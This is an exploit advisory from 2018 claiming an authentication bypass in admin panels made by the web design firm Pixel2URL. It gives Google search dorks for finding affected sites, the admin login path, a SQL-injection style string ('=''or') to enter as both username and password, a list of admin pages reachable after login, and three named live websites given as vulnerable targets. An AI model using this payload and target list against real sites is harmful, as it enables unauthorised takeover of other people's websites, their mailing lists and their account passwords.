#################################################################################################

# Exploit Title : Pixel2URL Web Design Company Sialkot Pakistan Authentication Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 23/09/2018
# Vendor Homepage : pixel2url.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592 - [ Authentication Bypass Issues ]

#################################################################################################

# Google Dork  : 

intext:''Powered By PIXEL2URL''

intext:''Proudly Powered By:Pixel2URL''

# Admin Panel Path : /admincp/index.php

# Exploit : 

Admin Username : '=''or'

Admin Password : '=''or'

# Useable Admin Control Panel URL Links => 

/admincp/mmainsections.php
/admincp/editmsection.php
/admincp/vinquiries.php
/admincp/mnews.php
/admincp/editnews.php?RecID=[ID-NUMBER]
/admincp/newsletter.php
/admincp/editemail.php?id=[ID-NUMBER]
/admincp/changepass.php
/admincp/mcontents.php
/admincp/editmcontent.php
/admincp/formaldata.php
/admincp/details.php?dataid=[ID-NUMBER]

#################################################################################################

# Example Vulnerable Sites =>  

mohsin-labels-printers.com/admincp/index.php => [ Proof of Concept ] => archive.is/0brtK

welsons.com/admincp/index.php

ajarimpex.com/admincp/index.php

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################